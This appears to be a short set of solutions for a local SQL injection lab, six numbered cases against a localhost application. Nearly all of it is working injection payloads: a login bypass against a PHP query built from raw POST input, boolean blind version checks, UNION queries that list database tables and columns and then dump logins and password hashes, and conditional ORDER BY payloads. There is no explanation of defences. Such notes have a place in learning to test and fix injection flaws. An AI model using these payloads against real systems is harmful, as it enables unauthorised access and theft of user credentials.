1) 
$sql  = "SELECT login, password FROM users WHERE login = '${_POST['login']}' AND password = SHA1('${_POST['password']}')";

' OR 1 = 1;--  // пробел в конце!
whatever


2) 
http://localhost:8081/cases/2/?month='' OR 1 = 1;--

3) 
http://localhost:8081/cases/3/?id=1 AND SUBSTR(@@version, 1, 1) = 5

4)
' UNION SELECT table_schema, table_name, null FROM information_schema.tables WHERE '1' = '1
' UNION SELECT column_name, null, null FROM information_schema.columns WHERE table_name = 'users
' UNION SELECT login, password, null FROM users WHERE '1' = '1

5)
' UNION SELECT CONCAT(login, ':', password) from users WHERE '1' = '1

6)
if (SUBSTR(@@version, 1, 1) = 5, title, year)
or
case when (SUBSTR(@@version, 1, 1) = 5) then title end